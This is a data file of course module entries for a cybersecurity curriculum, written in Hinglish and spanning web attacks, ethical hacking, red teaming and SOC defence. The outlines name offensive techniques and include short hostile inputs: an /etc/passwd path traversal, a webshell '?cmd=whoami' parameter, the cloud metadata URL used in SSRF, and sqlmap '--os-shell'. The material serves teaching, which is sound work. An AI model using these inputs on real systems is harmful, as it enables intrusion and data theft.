  { id: "web-01", phase: "Phase 5: Web Security", category: "Web Basics", title: "Web Security Architecture & Browser Model", level: "beginner", order: 1, description: "Browser se request ka poora safar — DNS, TCP, TLS, HTTP. Same-Origin Policy (SOP) — web ka foundation. CORS — Cross-Origin Resource Sharing, misconfigurations. Cookies, Sessions, localStorage. Authentication vs Authorization. JWT structure — header.payload.signature. Security headers: CSP, HSTS, X-Frame-Options, X-Content-Type-Options. Browser security sandbox. DevTools — Network tab, Console, Application, Sources. HTTP proxy setup (Burp Suite). Web application architecture types." },
  { id: "web-02", phase: "Phase 5: Web Security", category: "OWASP", title: "OWASP Top 10 — Complete Guide", level: "intermediate", order: 2, description: "OWASP Top 10 2021: A01 Broken Access Control (#1!), A02 Cryptographic Failures, A03 Injection, A04 Insecure Design, A05 Security Misconfiguration, A06 Vulnerable Components, A07 Identification/Auth Failures, A08 Software & Data Integrity, A09 Security Logging Failures, A10 SSRF. Real-world breach examples. DVWA aur WebGoat practice targets. OWASP Testing Guide (OTG). WSTG (Web Security Testing Guide). Vulnerability chaining — multiple small vulns se big impact." },
  { id: "web-03", phase: "Phase 5: Web Security", category: "Injection", title: "XSS — Cross-Site Scripting Complete", level: "intermediate", order: 3, description: "XSS types: Reflected, Stored (persistent), DOM-based. Basic to advanced payloads. Filter bypass: case, HTML entities, Unicode, null bytes, event handlers. Cookie theft — document.cookie, XMLHttpRequest. Keylogger via XSS. BeEF (Browser Exploitation Framework) — XSS botnet. CSP bypass techniques. XSS to account takeover — same-site cookies. XSS to CSRF. Stored XSS in PDF/SVG. AngularJS/Vue/React XSS differences. XSS to RCE (Electron apps). Mutation XSS (mXSS). Defense: output encoding, DOMPurify, CSP." },
  { id: "web-04", phase: "Phase 5: Web Security", category: "Injection", title: "SQL Injection — From Detection to RCE", level: "intermediate", order: 4, description: "SQLi detection methods — errors, boolean differences, time delays. UNION-based extraction — column count (ORDER BY, UNION SELECT NULL). Error-based: extractvalue(), updatexml(). Blind Boolean — true/false conditions. Time-based — SLEEP(), WAITFOR DELAY. Out-of-band DNS exfiltration. DB fingerprinting — MySQL, MSSQL, Oracle, PostgreSQL differences. Reading files: LOAD_FILE(). Webshell via INTO OUTFILE. WAF bypass techniques. sqlmap -- advanced: -p, --level, --risk, --tamper, --os-shell. Second-order SQLi." },
  { id: "web-05", phase: "Phase 5: Web Security", category: "Authentication", title: "Authentication Attacks — Practical", level: "intermediate", order: 5, description: "Brute force, dictionary attacks — Hydra, Medusa, Burp Intruder. Credential stuffing — breached databases. Password spraying — lockout avoid karna. Username enumeration — timing attacks, different error messages. MFA bypass: OTP brute force, SIM swap, MFA fatigue (push spamming), SS7 attacks. JWT attacks: 'none' algorithm, weak secret (HS256 crack), RS256→HS256, kid header injection. OAuth flaws: open redirect, CSRF, token leakage. Password reset token predictability. Default credentials list." },
  { id: "web-06", phase: "Phase 5: Web Security", category: "Advanced", title: "SSRF, XXE, IDOR & Logic Flaws", level: "advanced", order: 6, description: "SSRF — server ko internal requests karvana. AWS IMDSv1 exploit (169.254.169.254/latest/meta-data/). SSRF bypass: IP encoding, redirect, DNS rebinding. SSRF to RCE via internal services. XXE — DOCTYPE + ENTITY injection. File read via XXE. Blind XXE — out-of-band. IDOR — object ID manipulation, mass assignment. Business logic flaws: price manipulation, negative cart, workflow bypass, race conditions. Insecure deserialization — Java, PHP, Python gadget chains. HTTP request smuggling — CL.TE, TE.CL." },
  { id: "web-07", phase: "Phase 5: Web Security", category: "Tools", title: "Burp Suite — Professional Complete Guide", level: "advanced", order: 7, description: "Burp Suite components: Proxy, Repeater, Intruder, Scanner, Decoder, Comparer, Extender, Collaborator. Proxy setup aur FoxyProxy. Intercept, modify, replay. Intruder attack types: Sniper, Battering Ram, Pitchfork, Cluster Bomb. Intruder for brute force, IDOR testing, fuzzing. Collaborator — out-of-band vulnerability detection (blind SSRF, XXE, SQLi). Extensions: ActiveScan++, Autorize (IDOR), Param Miner (hidden params), Logger++, J2EEScan, Retire.js. Burp macros. Match & Replace rules. Scan configurations." },
  { id: "web-08", phase: "Phase 5: Web Security", category: "Advanced", title: "File Upload, LFI/RFI & Path Traversal", level: "advanced", order: 8, description: "File upload bypass: extension blacklist, MIME type, double extension (.php.jpg), null byte (%00), magic bytes. Webshell upload — PHP (?cmd=whoami), ASPX, JSP. Image polyglot (PHP code inside valid JPEG). Path traversal: ../../../../etc/passwd. URL encoding bypass: %2e%2e%2f, ..%2f. LFI — PHP wrappers: php://filter (base64 source), php://input, data://, phar://. Log poisoning through LFI → RCE. RFI — remote script include. ZIP slip attack. Webshell management tools. Directory listing vulnerabilities." },
  { id: "web-09", phase: "Phase 5: Web Security", category: "Advanced", title: "Advanced Web Attacks — SSTI, GraphQL, Deserialization", level: "advanced", order: 9, description: "SSTI (Server-Side Template Injection) — Jinja2 {{7*7}}, Twig, FreeMarker, Pebble. SSTI to RCE. Template engine fingerprinting. GraphQL — introspection, query depth DoS, batching attacks, injection. GraphQL information disclosure. Insecure deserialization — PHP unserialize(), Java (ysoserial gadget chains), Python pickle. Web cache poisoning vs deception. HTTP desync / request smuggling. DOM clobbering. Prototype pollution to RCE. Subdomain takeover — dangling DNS CNAMEs. Race conditions — concurrent requests." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 6: CYBERSECURITY CORE
  // ═══════════════════════════════════════════════════════════
  { id: "sec-01", phase: "Phase 6: Cybersecurity Basics", category: "Concepts", title: "CIA Triad, Frameworks & Kill Chain", level: "beginner", order: 1, description: "CIA Triad: Confidentiality, Integrity, Availability. Extended: Non-repudiation, Authentication, Authorization, Accountability. Security models: Bell-LaPadula, Biba, Clark-Wilson. NIST CSF: Identify, Protect, Detect, Respond, Recover. ISO 27001/27002. MITRE ATT&CK — tactics, techniques, procedures (TTPs). Lockheed Martin Cyber Kill Chain — 7 stages. Diamond Model of intrusion analysis. Unified Kill Chain. Zero Trust Architecture. Defence in Depth. Security by Design. Shift-left security." },
  { id: "sec-02", phase: "Phase 6: Cybersecurity Basics", category: "Threats", title: "Threat Actors, Malware & Attack Types", level: "beginner", order: 2, description: "Threat actors: Script kiddies, Hacktivists (Anonymous), Cybercriminals, APT groups (Lazarus, APT28/Fancy Bear, Cozy Bear), Insiders. Malware taxonomy: Virus, Worm, Trojan, RAT, Ransomware (WannaCry, NotPetya), Spyware, Adware, Rootkit, Bootkit, Fileless malware, Cryptominer. Social engineering: Phishing, Spear phishing, Whaling, Vishing, Smishing, Pretexting, Tailgating. Zero-day vs N-day. APT lifecycle. Supply chain attacks (SolarWinds). Living off the land attacks." },
  { id: "sec-03", phase: "Phase 6: Cybersecurity Basics", category: "Cryptography", title: "Cryptography — Applied Security", level: "intermediate", order: 3, description: "Symmetric: AES-128/256 (ECB vs CBC vs GCM modes), DES/3DES (broken). Asymmetric: RSA, ECC, Diffie-Hellman key exchange. Hashing: MD5/SHA-1 (broken), SHA-256/SHA-3, bcrypt/scrypt/Argon2 (passwords). Digital signatures. PKI — certificates, CA chain, CRL, OCSP. TLS 1.3 handshake. PGP/GPG. Crypto attacks: Birthday, MITM, Padding oracle (CBC), timing attacks, BEAST, CRIME, POODLE. Key management. HSM. Quantum computing threat — post-quantum cryptography." },
  { id: "sec-04", phase: "Phase 6: Cybersecurity Basics", category: "Defense", title: "Firewalls, IDS/IPS & Security Architecture", level: "intermediate", order: 4, description: "Firewall types: packet filtering, stateful, application layer (WAF), NGFW. Firewall rules — allow/deny. WAF rules — ModSecurity, AWS WAF. IDS (detect) vs IPS (prevent). Signature vs anomaly vs behavioral detection. Snort/Suricata — rule syntax. Network security zones: DMZ, internal, external. Zero Trust — never trust, always verify. Network segmentation. Micro-segmentation. SASE (Secure Access Service Edge). SD-WAN security. Honeypots aur deception. Security monitoring architecture." },
  { id: "sec-05", phase: "Phase 6: Cybersecurity Basics", category: "Defense", title: "SIEM, Log Analysis & Threat Intel", level: "intermediate", order: 5, description: "SIEM platforms: Splunk, ELK, QRadar, ArcSight. Log sources aur normalization. Critical Windows events: 4624/4625 (login), 4688 (process), 4697 (service), 7045, 1102 (log cleared!). Linux syslog format. Alert correlation rules. IOC types: IPs, domains, hashes, URLs, email subjects. STIX/TAXII format. Threat intel platforms: MISP, OpenCTI. Open sources: VirusTotal, AbuseIPDB, Shodan, AlienVault OTX. IOA vs IOC. TTP-based detection vs IOC-based. Threat intel lifecycle." },
  { id: "sec-06", phase: "Phase 6: Cybersecurity Basics", category: "Incident Response", title: "Incident Response & Digital Forensics", level: "intermediate", order: 6, description: "IR lifecycle: Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned. Chain of custody. Evidence acquisition — write blockers. Forensic tools: Autopsy, FTK Imager, Volatility, dd. Windows forensic artifacts: Prefetch, ShellBags, LNK, Amcache. Memory forensics: process list, network connections, malfind. Network forensics: pcap analysis. Mobile forensics basics. IR playbooks for ransomware, phishing, data breach. CERT-In reporting (India). Cyber insurance claims. IR team communication." },
  { id: "sec-07", phase: "Phase 6: Cybersecurity Basics", category: "Compliance", title: "Laws, Compliance & Ethics", level: "intermediate", order: 7, description: "IT Act 2000 (India) — Section 66 (hacking), 66C (identity theft), 66D (cheating using computer), 66E (privacy violation), 66F (cyberterrorism), 67 (obscenity). GDPR key requirements. PCI-DSS for payment systems. HIPAA for healthcare. ISO 27001 certification process. CERT-In mandatory reporting. Bug bounty legal framework — authorization requirement. Responsible disclosure vs full disclosure. CVE/CWE system. Ethics in security research. Non-disclosure agreements. Penetration testing authorization. Cyber laws enforcement in India." },
  { id: "sec-08", phase: "Phase 6: Cybersecurity Basics", category: "Risk", title: "Risk Management & Security Architecture", level: "advanced", order: 8, description: "Risk = Threat × Vulnerability × Impact. Risk assessment methodologies: OCTAVE, FAIR, NIST. Quantitative (ALE, SLE, ARO) vs qualitative risk. Risk treatments: Accept, Avoid, Transfer (insurance), Mitigate. Security controls: Preventive, Detective, Corrective, Compensating. Business Impact Analysis (BIA). RPO, RTO, MTTR metrics. Disaster recovery planning. Security architecture frameworks: SABSA, TOGAF, Zachman. Asset inventory management. Vulnerability management program. Third-party risk assessment. SCRM (Supply Chain Risk Management)." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 7: ETHICAL HACKING & PENTESTING
  // ═══════════════════════════════════════════════════════════
  { id: "hack-01", phase: "Phase 7: Ethical Hacking", category: "Methodology", title: "Penetration Testing Methodology", level: "beginner", order: 1, description: "Pentest types: Black box, White box, Grey box, Crystal box. Phases: Pre-engagement (RoE, scope, contract), Passive Recon, Active Recon, Scanning/Enumeration, Exploitation, Post-exploitation, Reporting. PTES standard. OWASP Testing Guide. Threat modeling — STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, DoS, Elevation). DREAD scoring. Pentesting vs Red Team vs Bug Bounty. Documentation throughout. Notes, screenshots, timestamps. Tools management. Staying within scope — legal protection." },
  { id: "hack-02", phase: "Phase 7: Ethical Hacking", category: "Recon", title: "OSINT & Passive Reconnaissance", level: "intermediate", order: 2, description: "OSINT framework — categories. Maltego — visual link analysis. theHarvester — emails, subdomains, IPs from public sources. Recon-ng framework. Shodan — internet-connected devices ('the world's most dangerous search engine'). Censys. Zoomeye. Google Dorking: site:, filetype:, inurl:, intitle:, intext:, cache:, 'index of', 'password'. GitHub dorking — API keys, passwords in public code. Whois, ARIN. LinkedIn employee mapping. Wayback Machine — archived pages. Social media OSINT. Metadata from documents (exiftool)." },
  { id: "hack-03", phase: "Phase 7: Ethical Hacking", category: "Recon", title: "Active Recon & Service Enumeration", level: "intermediate", order: 3, description: "Active recon — directly interact karna (noisy, detectable). Protocol-specific enumeration: SMB (enum4linux, smbclient, smbmap, crackmapexec), LDAP (ldapsearch), SNMP (snmpwalk community strings), NFS (showmount), RPC (rpcclient), SMTP (VRFY, EXPN user enumeration). Web enumeration: Gobuster (dir, dns, vhost modes), Feroxbuster, Dirbuster. Subdomain enumeration: amass, subfinder. Virtual host fuzzing — ffuf. Certificate transparency. Email harvesting. Technology fingerprinting (Wappalyzer, whatweb)." },
  { id: "hack-04", phase: "Phase 7: Ethical Hacking", category: "Vulnerability", title: "Vulnerability Assessment — Tools & Techniques", level: "intermediate", order: 4, description: "Vulnerability scanning tools: Nessus (professional), OpenVAS (free), Qualys, Rapid7 Nexpose. Web scanners: Nikto (web server misconfigs), WPScan (WordPress), Nuclei (template-based, fast). CVSS v3.1 scoring system (0-10). CVE/NVD database. ExploitDB aur searchsploit. Vulnerability management program — detect, prioritize, patch, verify. Authenticated vs unauthenticated scanning. False positives management. Patch management cycle. Risk-based prioritization. Continuous scanning. ASM (Attack Surface Management)." },
  { id: "hack-05", phase: "Phase 7: Ethical Hacking", category: "Exploitation", title: "Metasploit Framework — Complete", level: "advanced", order: 5, description: "Metasploit architecture: exploits, payloads (singles/stagers/stages), auxiliaries, post modules, encoders, nops. msfconsole — search, use, info, show options, set, run. Payload types: generic/shell, meterpreter, VNC. MSFvenom — payload generation (exe/elf/apk/war/py). Meterpreter commands: sysinfo, getuid, hashdump, shell, upload/download, screenshot, keyscan_start, run post/. Pivoting — route, socks proxy. Persistence: metsvc, run persistence. Post-exploitation modules. Database (msf database). AutoRunScript. Resource scripts (.rc files)." },
  { id: "hack-06", phase: "Phase 7: Ethical Hacking", category: "Password", title: "Password Attacks — Hashcat & John", level: "advanced", order: 6, description: "Offline vs online attacks. Hashcat attack modes: Dictionary (-a 0), Brute-force (-a 3, ?u?l?d?s masks), Combination (-a 1), Rule-based, Hybrid. Hash types: MD5 (0), SHA-1 (100), NTLM (1000), NetNTLMv2 (5600), bcrypt (3200), WPA (22000). Rules: best64, d3ad0ne, InsidePro. Wordlists: rockyou.txt, SecLists, CewL (custom from website). John the Ripper — single/wordlist/incremental modes. Pass-the-Hash — wmiexec, psexec without cracking. Responder — NTLMv2 hash capture. Rainbow tables vs salting." },
  { id: "hack-07", phase: "Phase 7: Ethical Hacking", category: "Social Eng", title: "Social Engineering & Phishing — Practical", level: "advanced", order: 7, description: "Psychology principles: Authority, Urgency, Social proof, Scarcity. Phishing types: mass, spear (targeted), whaling (CEO), smishing, vishing. Gophish framework — campaign management. King Phisher. SET (Social Engineering Toolkit) — credential harvester, site cloner. Email spoofing — SPF/DKIM/DMARC bypass. Pretexting scripts. Vishing scripts. Baiting — USB drops. QR code phishing. Clone phishing. Teams/Slack phishing. Callback phishing. Enterprise awareness training design. Phishing simulation metrics." },
  { id: "hack-08", phase: "Phase 7: Ethical Hacking", category: "Post-Exploit", title: "Post-Exploitation — Linux Privilege Escalation", level: "advanced", order: 8, description: "LinPEAS — automated privesc enumeration. Manual checks: sudo -l, find / -perm -4000 2>/dev/null, crontab -l, cat /etc/crontab, writable files, SUID/SGID, capabilities. GTFOBins — SUID/sudo/capability binaries ka abuse. Sudo misconfigs: NOPASSWD, ALL, env_keep. Cron job hijacking — writable script path. LD_PRELOAD exploit. Writable /etc/passwd. PATH hijacking. Docker group escape. LXD/LXC abuse. Kernel exploit (uname -r → searchsploit). NFS no_root_squash. /etc/shadow readable. Weak file permissions on sensitive files." },
  { id: "hack-09", phase: "Phase 7: Ethical Hacking", category: "Post-Exploit", title: "Post-Exploitation — Windows Privilege Escalation", level: "advanced", order: 9, description: "WinPEAS — automated enumeration. PowerUp.ps1. Manual: whoami /priv, whoami /groups, net localgroup administrators, systeminfo, wmic service list. Common vectors: Unquoted service paths, weak service DACL, AlwaysInstallElevated, DLL hijacking search order, token impersonation. SeImpersonatePrivilege — JuicyPotato, PrintSpoofer, GodPotato. SeDebugPrivilege — LSASS dump. UAC bypass — fodhelper, computerdefaults, sdclt. Credential hunting: files, registry, unattend.xml, web.config, GPP passwords." },
  { id: "hack-10", phase: "Phase 7: Ethical Hacking", category: "Mobile", title: "Mobile App Security — Android Pentesting", level: "advanced", order: 10, description: "Android security model: permissions, sandboxing, APK structure (AndroidManifest.xml, classes.dex). Static analysis: APKTool (decompile resources), JADX (Java decompile), MobSF (automated). Dynamic analysis: Frida (runtime hooking — JavaScript injection), Objection (Frida wrapper), drozer. ADB commands. Burp + Android — SSL pinning bypass (Frida scripts, Objection, manual). OWASP Mobile Top 10. Vulnerabilities: insecure storage, exported components, deeplink hijacking, hardcoded secrets, unprotected broadcast receivers. Root detection bypass." },
  { id: "hack-11", phase: "Phase 7: Ethical Hacking", category: "Tools", title: "Steganography & Covert Channels", level: "intermediate", order: 11, description: "Steganography — media files mein data hide karna. Image: LSB (Least Significant Bit) technique. Tools: steghide (embed/extract), stegsolve (bit plane analysis), zsteg (PNG/BMP), outguess, OpenStego. Audio: Sonic Visualiser — spectrogram mein hidden text. PDF steganography. Network covert channels: DNS tunneling (dnscat2), ICMP tunnel, HTTPS C2. Detecting steganography: binwalk, strings, file command, exiftool, entropy analysis. CTF steg challenges common. Forensics approach: unusual file size, metadata anomalies." },
  { id: "hack-12", phase: "Phase 7: Ethical Hacking", category: "Tools", title: "CTF — Capture the Flag Complete Guide", level: "intermediate", order: 12, description: "CTF categories: Web (SQL injection, XSS, LFI/RFI, SSTI), Cryptography (Caesar, Vigenere, RSA, AES, hash cracking), Forensics (file analysis, memory forensics, steganography, network captures), Pwn (binary exploitation — buffer overflow, ROP, heap), Reversing (Ghidra, GDB, IDA), OSINT, Misc. Essential tools: CyberChef (everything!), Ghidra, pwntools, Wireshark, steghide, John/Hashcat. Platforms: PicoCTF (beginner), HackTheBox (intermediate), TryHackMe (guided), CTFtime (events), PwnCollege. Writeup culture — padhna aur likhna." },
  { id: "hack-13", phase: "Phase 7: Ethical Hacking", category: "Reporting", title: "Pentest Report Writing", level: "intermediate", order: 13, description: "Professional report structure: Cover page, Executive Summary (C-suite ke liye), Scope & Methodology, Technical Findings, Risk Matrix, Remediation Roadmap, Appendix. Finding template: Title, Severity (Critical/High/Medium/Low/Info), CVSS score, Affected systems, Description, Impact (technical + business), Steps to Reproduce, Screenshot/PoC evidence, Remediation recommendation, References. CVSS v3.1 calculator. Evidence handling best practices. Dradis/PlexTrac report tools. Peer review importance. Re-test after remediation." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 8: RED TEAM OPERATIONS
  // ═══════════════════════════════════════════════════════════
  { id: "red-01", phase: "Phase 8: Red Team", category: "Red Team Core", title: "Red Teaming — Methodology & Planning", level: "advanced", order: 1, description: "Red Team vs Penetration Testing fark — objectives, duration, stealth. Adversary simulation — real APT TTPs copy karna. Red team planning: objectives (Crown Jewels), scope, RoE, communication plan, get-out-of-jail letter. TIBER-EU framework. Assumed breach exercises. Cyber table-top exercises. Red team phases: Reconnaissance, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Impact. OPSEC during operations — never blow your cover." },
  { id: "red-02", phase: "Phase 8: Red Team", category: "C2", title: "Command & Control (C2) Infrastructure", level: "advanced", order: 2, description: "C2 frameworks: Cobalt Strike (industry standard, Beacon), Sliver (open source), Havoc, Mythic (multi-platform), Metasploit, Covenant (.NET). C2 communication channels: HTTP/HTTPS, DNS, SMB, TCP. Beaconing — sleep intervals aur jitter. Domain fronting — CDN (CloudFront, Cloudflare) ke through traffic. Malleable C2 profiles — legitimate traffic jaisa dikhna. Redirectors: Apache mod_rewrite, socat, nginx. C2 infrastructure setup: VPS, domain fronting, categorized domains (aged domains). Teardown aur cleanup. OPSEC considerations." },
  { id: "red-03", phase: "Phase 8: Red Team", category: "Active Directory", title: "Active Directory Attacks — Complete", level: "advanced", order: 3, description: "AD attack path: Enumeration → Privesc → Lateral Movement → Domain Compromise. Kerberoasting — Service accounts ke hashes steal karna (GetUserSPNs.py). AS-REP Roasting — pre-auth disabled (GetNPUsers.py). Pass the Hash — NTLM hash reuse (wmiexec, psexec). Pass the Ticket — .kirbi files. Overpass the Hash — hash to ticket. DCSync — replicating DC (secretsdump.py). Golden Ticket — KRBTGT hash (Mimikatz). Silver Ticket — service ticket forge. LAPS abuse. GPO misconfiguration. AdminSDHolder abuse. Forest trust attacks. Constrained delegation exploitation." },
  { id: "red-04", phase: "Phase 8: Red Team", category: "Active Directory", title: "BloodHound & Attack Path Analysis", level: "advanced", order: 4, description: "BloodHound — graph-based AD attack path finder. SharpHound/BloodHound.py collectors — data gather karna. Neo4j database aur BloodHound GUI. Pre-built queries: Shortest path to DA, Kerberoastable accounts, AS-REP roastable, unconstrained delegation, high value targets, owned paths. Custom Cypher queries — complex queries likhna. 'Owned' nodes mark karna. Attack path chaining — small misconfigs combine karna. PowerView manual enumeration. ADExplorer — LDAP GUI browser. BloodHound Enterprise vs community. Defensive analysis with BloodHound." },
  { id: "red-05", phase: "Phase 8: Red Team", category: "Lateral Movement", title: "Lateral Movement Techniques", level: "advanced", order: 5, description: "Lateral movement goal — ek system se doosre pe move karna. Impacket suite: wmiexec.py, psexec.py, smbexec.py, atexec.py, secretsdump.py. CrackMapExec (CME/NetExec) — Swiss army knife for Windows networks. RDP hijacking — active sessions. WinRM (port 5985/5986). DCOM — Excel/Word/Outlook COM objects. Admin shares abuse: C$, ADMIN$. PSExec — original aur alternatives. Token impersonation (incognito). Pass the Hash, Pass the Ticket. Pivoting — port forwarding, SOCKS proxy (Chisel, Ligolo, SSH tunneling). Network reconnaissance post-compromise." },
  { id: "red-06", phase: "Phase 8: Red Team", category: "Evasion", title: "AV/EDR Evasion Techniques", level: "advanced", order: 6, description: "How AV/EDR works: signatures, heuristics, behavioral, sandboxing, ML. Evasion techniques: Obfuscation (string encoding, base64, XOR), AMSI bypass (patch in memory), ETW patching (disable telemetry), Direct syscalls (avoid API hooks — SysWhispers, HellsGate), Process injection (classic DLL injection, process hollowing, reflective DLL, early-bird APC). LOLBins abuse. Signed binary proxy execution. Packed executables. Fileless attacks — PowerShell/WMI/mshta. Sleep obfuscation. Custom C2 profiles. Staged vs stageless payloads. Defender exclusions abuse." },
  { id: "red-07", phase: "Phase 8: Red Team", category: "Persistence & Exfil", title: "Persistence & Data Exfiltration", level: "advanced", order: 7, description: "Windows persistence: Registry Run keys, Scheduled tasks (schtasks), Services (sc.exe), WMI event subscriptions (fileless!), DLL side-loading, Boot/logon scripts, COM hijacking, Shortcut modification, AppInit_DLLs, IFEO (Image File Execution Options). Linux persistence: Cron, systemd, .bashrc/.profile, authorized_keys, SUID backdoor, shared library hijacking, PAM module. Data exfiltration channels: DNS tunneling (dnscat2, Iodine), HTTPS, cloud storage APIs (Dropbox, Google Drive), ICMP tunnel, email, steganography in image uploads. DLP bypass techniques." },
  { id: "red-08", phase: "Phase 8: Red Team", category: "Malware", title: "Malware Development for Red Teams", level: "advanced", order: 8, description: "Malware dev ethics — sirf authorized aur controlled environments mein. PE file format — sections: .text, .data, .rdata, .bss. Dropper → Loader → Payload chain. Process injection: CreateRemoteThread, QueueUserAPC, NtCreateThreadEx, thread hijacking, process hollowing. Shellcode injection C mein. Payload encryption — XOR, AES-256-CBC. Custom RAT architecture. Keylogger — SetWindowsHookEx. C2 communication over HTTP. YARA rules se apna malware scan karo. Fileless malware — PowerShell, WMI, registry-based. AV evasion during development. Testing in isolated lab." },
  { id: "red-09", phase: "Phase 8: Red Team", category: "Physical", title: "Physical Security Testing & Hardware", level: "advanced", order: 9, description: "Physical red team — entry bypass karna. Lock picking: pin tumbler, wafer locks, picks set practice. Bump keys. Bypass tools: under-door tool, crash bar bypass. RFID/NFC cloning — Proxmark3, Flipper Zero. Badge cloning attacks. Tailgating aur social engineering for entry. Dumpster diving methodology. BadUSB attacks — Rubber Ducky, O.MG Cable, Bash Bunny scripts. LAN Turtle — in-network implant. Raspberry Pi based implants. Screen bleed / shoulder surfing. CCTV blind spots. Building reconnaissance (Google Maps, floor plans). Physical report writing." },
  { id: "red-10", phase: "Phase 8: Red Team", category: "Malware Analysis", title: "Malware Analysis — Static & Dynamic", level: "advanced", order: 10, description: "Analysis environment: isolated VM (REMnux, FlareVM, Any.run). Static analysis tools: PEStudio, PE-bear (PE structure), Detect-It-Easy (packer detection), Strings, CFF Explorer, IDA Pro/Ghidra (disassembly/decompilation), Cutter. Dynamic analysis tools: x64dbg (debugger), Process Monitor (ProcMon — files/registry), Process Hacker (processes/memory), Regshot (before-after registry diff), FakeNet-NG (network simulation), Wireshark. Behavior analysis checklist: new files, registry changes, network connections, process spawning. YARA rule writing. Cuckoo sandbox. Hybrid Analysis, Any.run online sandboxes." },

  // ═══════════════════════════════════════════════════════════
  // PHASE 9: BLUE TEAM & SOC
  // ═══════════════════════════════════════════════════════════
  { id: "blue-01", phase: "Phase 9: Blue Team & SOC Analyst", category: "SOC", title: "SOC Analyst Role & Workflow", level: "beginner", order: 1, description: "SOC tiers: L1 (alert triage, 24/7), L2 (investigation, threat hunting), L3 (advanced threats, IR lead). SOC workflow: Alert received → Triage (real or false positive?) → Investigation → Escalate/Close → Document. Metrics: MTTD, MTTR. Alert fatigue — 1000s of alerts per day. Triage checklist. SOC tools ecosystem: SIEM, EDR, SOAR, TIP, NDR, Vulnerability Scanner. Shift handoff aur continuity. Use case development. SOC maturity model. In-house vs MSSP (Managed Security Service Provider). Career progression SOC L1 → IR → Threat Hunter → Detection Engineer." },
  { id: "blue-02", phase: "Phase 9: Blue Team & SOC Analyst", category: "SIEM", title: "Splunk — Complete SOC Guide", level: "intermediate", order: 2, description: "Splunk architecture: indexers, search heads, forwarders (heavy/universal). SPL query language — complete guide. Search: index=, sourcetype=, earliest=, latest=. Commands: stats, eval, rex (regex extraction), transaction, lookup, inputlookup, table, dedup, rename. Timechart — trending aur anomalies. Alerts — scheduled searches, threshold-based. Dashboards — real-time monitoring. CIM (Common Information Model) aur data models. Splunk ES (Enterprise Security) app. Important queries: failed logins, new admin accounts, unusual processes, data exfil patterns. Performance optimization." },
  { id: "blue-03", phase: "Phase 9: Blue Team & SOC Analyst", category: "SIEM", title: "ELK Stack — Security Monitoring", level: "intermediate", order: 3, description: "ELK: Elasticsearch (storage + search), Logstash (collection + parsing), Kibana (visualization). Elastic Agent aur Fleet management. Filebeat, Winlogbeat, Packetbeat, Auditbeat. KQL (Kibana Query Language). Index patterns aur data views. Detection rules (built-in + custom). SIEM in Kibana — alerts, cases. ECS (Elastic Common Schema) — standardized field names. Sigma rules to ELK conversion. Elastic Defend (EDR). Elastic Cloud vs self-hosted. HELK — Hunting ELK with Jupyter notebooks. Integration with threat intel feeds. Building detection dashboards." },
  { id: "blue-04", phase: "Phase 9: Blue Team & SOC Analyst", category: "Forensics", title: "Windows Digital Forensics", level: "advanced", order: 4, description: "Forensic principles aur methodology. Evidence acquisition — FTK Imager, dd, dcfldd. Write blockers. Autopsy — GUI forensic suite. Windows artifacts deep dive: $MFT (every file entry), Prefetch (program execution, 10-sec accuracy), LNK files (target info, timestamps), ShellBags (folder access order), Amcache/Shimcache (program execution), BAM (background activity moderator), UserAssist (GUI program launches), Jump Lists, SRUM (resource usage). VSS analysis — recover deleted files. Browser artifacts (History, Downloads, Cache). Recycle bin ($I files). Event log forensics." },
  { id: "blue-05", phase: "Phase 9: Blue Team & SOC Analyst", category: "Forensics", title: "Memory Forensics — Volatility Framework", level: "advanced", order: 5, description: "Memory forensics importance — fileless malware sirf RAM mein hota hai. Acquisition: WinPMEM, DumpIt, Magnet RAM, crash dumps (%SystemRoot%\\MEMORY.DMP). Volatility 3 plugins: windows.pslist, windows.pstree, windows.cmdline, windows.netscan, windows.malfind (injected code!), windows.dlllist, windows.hashdump, windows.registry.printkey, windows.filescan, windows.handles. Linux memory plugins. Parent-child process anomalies (svchost without services.exe parent). Hollowed processes detect karna. Unpacking malware from memory. Extracting browser passwords from RAM. Lateral movement artifacts." },
  { id: "blue-06", phase: "Phase 9: Blue Team & SOC Analyst", category: "Forensics", title: "Network Forensics & Traffic Analysis", level: "advanced", order: 6, description: "Network forensics — traffic se incident reconstruct karna. Zeek/Bro logs: conn.log, dns.log, http.log, files.log, ssl.log, weird.log. Wireshark forensics — pcap analysis. NetworkMiner — file extraction, OS fingerprint. JA3/JA3S — TLS client/server fingerprinting (malware detection). JARM fingerprinting. C2 beaconing patterns: regular intervals, consistent byte sizes, low entropy domains. DNS exfil detection — high volume, long names, base64 in queries. Email forensics — header analysis, SPF/DKIM/DMARC checks. HTTP user agent analysis. Encrypted traffic analysis." },
  { id: "blue-07", phase: "Phase 9: Blue Team & SOC Analyst", category: "Threat Hunting", title: "Threat Hunting Methodologies", level: "advanced", order: 7, description: "Threat hunting — proactively search for threats that evade automated detection. Hunt types: Hypothesis-driven (MITRE ATT&CK based), Intel-driven (IOCs), Machine-learning anomaly. Process: Hypothesis → Data collection → Analysis → Report → Improve detection. Common hunts: LOLBin abuse (certutil, powershell -enc, mshta), lateral movement (WMI, PsExec, RDP), unusual parent-child processes, credential dumping patterns (LSASS access), data staging in temp folders, beaconing (periodic outbound). Tools: Velociraptor, Osquery, Carbon Black, Elastic. Documenting hunts → converting to detection rules." },
  { id: "blue-08", phase: "Phase 9: Blue Team & SOC Analyst", category: "IR", title: "Incident Response Playbooks & SOAR", level: "advanced", order: 8, description: "IR playbooks for common scenarios: Ransomware (isolate, preserve, investigate, recover), Phishing (block sender, analyze email, check clicks, credential reset), Data breach (identify scope, legal notification, containment), Insider threat, DDoS (traffic analysis, mitigation, ISP coordination). SOAR platforms: Splunk SOAR (Phantom), Palo Alto XSOAR, IBM Resilient, Swimlane. Playbook automation — enrichment, containment, notification. Alert enrichment: auto-lookup IP reputation, VirusTotal hash, user context. Communication plan. Legal considerations. Post-incident review." },
